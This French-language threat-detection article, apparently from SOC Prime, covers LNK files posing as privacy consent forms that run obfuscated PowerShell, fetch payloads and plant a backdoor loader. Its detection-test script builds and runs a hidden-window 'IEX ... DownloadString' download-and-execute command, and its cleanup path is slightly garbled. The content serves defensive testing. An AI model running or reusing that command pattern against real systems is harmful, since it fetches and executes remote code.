SOC Prime Bias: Élevé

19 Jun 2026 07:26 UTC

Que contenait réellement le fichier de raccourci déguisé en formulaire de consentement à la confidentialité ?

Author Photo
SOC Prime Team linkedin icon Suivre
Que contenait réellement le fichier de raccourci déguisé en formulaire de consentement à la confidentialité ?
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Les acteurs de la menace distribuent des fichiers LNK malveillants déguisés en formulaires de consentement à la protection de la vie privée pour tromper les utilisateurs et les amener à les ouvrir. Une fois exécutés, ces fichiers raccourcis lancent des commandes PowerShell obscurcies qui récupèrent et exécutent des charges utiles supplémentaires en utilisant des techniques sans fichier. La chaîne d’attaque est conçue pour voler des informations et déployer un chargeur de porte dérobée qui aide à maintenir l’accès et la persistance.

Enquête

L’enquête a montré que les fichiers LNK intègrent du code PowerShell obscurci responsable du téléchargement de scripts supplémentaires. Ces scripts secondaires incluent un téléchargeur qui récupère des charges utiles depuis des services web légitimes et un chargeur qui les exécute directement en mémoire. L’acteur de la menace abuse également du Planificateur de tâches Windows pour la persistance et utilise des documents leurres pour donner à l’activité malveillante une apparence légitime.

Atténuation

Les organisations doivent appliquer une vérification stricte des extensions de fichier et avertir les utilisateurs des fichiers LNK déguisés en documents ordinaires. Les équipes de sécurité devraient surveiller de près l’activité du Planificateur de tâches, les journaux d’exécution PowerShell et les connexions réseau sortantes. Les utilisateurs doivent également être formés à valider à la fois l’expéditeur et le chemin de livraison de tout fichier entrant avant de l’ouvrir.

Réponse

Si cette activité est détectée, les administrateurs doivent immédiatement examiner les entrées suspectes du Planificateur de tâches et la création de scripts PowerShell inhabituels dans les répertoires accessibles aux utilisateurs. Les journaux PowerShell doivent être analysés, et les connexions externes doivent être suivies, en particulier celles impliquant des plateformes cloud légitimes ou des services de stockage web. Une enquête médico-légale complète doit ensuite être effectuée sur tout script malveillant identifié et sur le trafic réseau non autorisé.

graph TB %% Définition des classes classDef initial_access fill:#f96,stroke:#333,stroke-width:2px classDef execution fill:#69f,stroke:#333,stroke-width:2px classDef persistence fill:#6c6,stroke:#333,stroke-width:2px classDef discovery fill:#ff9,stroke:#333,stroke-width:2px classDef exfiltration fill:#f66,stroke:#333,stroke-width:2px %% Étape d’accès initial action_user_exec[« <b>Action</b> – <b>T1204.002 User Execution: Malicious File</b><br/>La victime exécute un fichier raccourci .LNK trompeur<br/>déguisé en formulaire de consentement. »] class action_user_exec initial_access action_masquerade[« <b>Action</b> – <b>T1036.008 Masquerading: Masquerade File Type</b><br/>Le fichier .LNK imite un formulaire légitime<br/>de consentement aux informations personnelles. »] class action_masquerade initial_access %% Étape d’exécution action_obfuscation[« <b>Action</b> – <b>T1027.009 Obfuscated Files or Information: Embedded Payloads</b><br/>Le fichier .LNK contient une charge utile<br/>PowerShell obfusquée. »] class action_obfuscation execution action_cloud_api[« <b>Action</b> – <b>T1059.009 Command and Scripting Interpreter: Cloud API</b><br/>Le script PowerShell utilise des services cloud<br/>pour télécharger des scripts malveillants supplémentaires. »] class action_cloud_api execution action_proxy_exec[« <b>Action</b> – <b>T1216 System Script Proxy Execution</b><br/>Le logiciel malveillant utilise l’exécution proxy<br/>des scripts système afin de rester discret. »] class action_proxy_exec execution action_reflective_load[« <b>Action</b> – <b>T1620 Reflective Code Loading</b><br/>Les scripts téléchargés sont exécutés en mémoire<br/>à l’aide de méthodes sans fichier. »] class action_reflective_load execution %% Étape de persistance action_scheduled_task[« <b>Action</b> – <b>T1053 Scheduled Task/Job</b><br/>Une tâche est enregistrée dans le Planificateur de tâches Windows<br/>pour garantir l’exécution après redémarrage. »] class action_scheduled_task persistence %% Étape de découverte action_sys_info[« <b>Action</b> – <b>T1082 System Information Discovery</b><br/>Le script PowerShell collecte les informations du système d’exploitation,<br/>les paramètres réseau et les adresses IP. »] class action_sys_info discovery action_query_reg[« <b>Action</b> – <b>T1012 Query Registry</b><br/>Le script interroge le registre afin d’identifier<br/>les processus actifs et les produits de sécurité. »] class action_query_reg discovery %% Étape objectif action_backdoor[« <b>Action</b> – <b>Backdoor loader-type</b><br/>Maintient l’accès et permet d’effectuer<br/>d’autres activités malveillantes. »] class action_backdoor exfiltration action_selective_exclusion[« <b>Action</b> – <b>T1679 Selective Exclusion</b><br/>La porte dérobée facilite les exclusions sélectives<br/>pour contourner les contrôles de sécurité. »] class action_selective_exclusion exfiltration %% Flux des connexions action_user_exec –>|mène_à| action_masquerade action_masquerade –>|déclenche| action_obfuscation action_obfuscation –>|contient| action_cloud_api action_cloud_api –>|déploie| action_proxy_exec action_proxy_exec –>|effectue| action_reflective_load action_reflective_load –>|établit| action_scheduled_task action_scheduled_task –>|exécute| action_sys_info action_sys_info –>|mène_à| action_query_reg action_query_reg –>|informe| action_backdoor action_backdoor –>|active| action_selective_exclusion

Flux d’attaque

Exécution de la simulation

Prérequis : La vérification préliminaire de la télémétrie et du modèle de base doit être réussie.

Justification : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés conduiront à un diagnostic erroné.

  • Narration et commandes d’attaque : L’adversaire cherche à établir un accès initial et à télécharger une charge utile de malware de deuxième phase. Pour éviter la détection par des analyseurs de fichiers simples, ils utilisent un fichier LNK (raccourci). Ce fichier LNK est conçu pour exécuter powershell.exe dans une fenêtre cachée. La commande passée à PowerShell utilise Invoke-Expression and DownloadString pour extraire un script depuis une URL distante. Cela imite les attaques réelles de « Vivre sur la terre » (LotL) où des binaires légitimes sont utilisés pour réaliser des actions malveillantes, dans le but de contourner les antivirus basés sur des signatures traditionnelles.

  • Script de test de régression :

    # 1. Définir l'URL cible (en utilisant un site bénin pour le test)
    $url = "https://www.google.com"
    
    # 2. Créer la chaîne de charge utile PowerShell malveillante
    # Cette chaîne est conçue pour déclencher la détection 'DownloadString' et 'Invoke-Expression'
    $payload = "IEX (New-Object Net.WebClient).DownloadString('$url')"
    
    # 3. Créer un contenu fictif de fichier LNK (Simulé)
    # Dans une vraie attaque, ce serait un fichier .lnk binaire. 
    # Ici, nous exécutons la commande directement pour garantir que le log ScriptBlock est généré pour validation.
    Write-Host "[+] Simulation de l'exécution de PowerShell malveillant via la charge utile LNK..."
    powershell.exe -WindowStyle Hidden -Command $payload
    
    Write-Host "[+] Commande de simulation exécutée. Vérifier l'ID d'événement 4104."
  • Commandes de nettoyage :

    # Supprimer tous les artefacts si des fichiers ont été créés
    Remove-Item -Path "$HOMEDesktopSimulated_Malicious_LNK.lnk" -ErrorAction SilentlyContinue
    Write-Host "[+] Nettoyage terminé."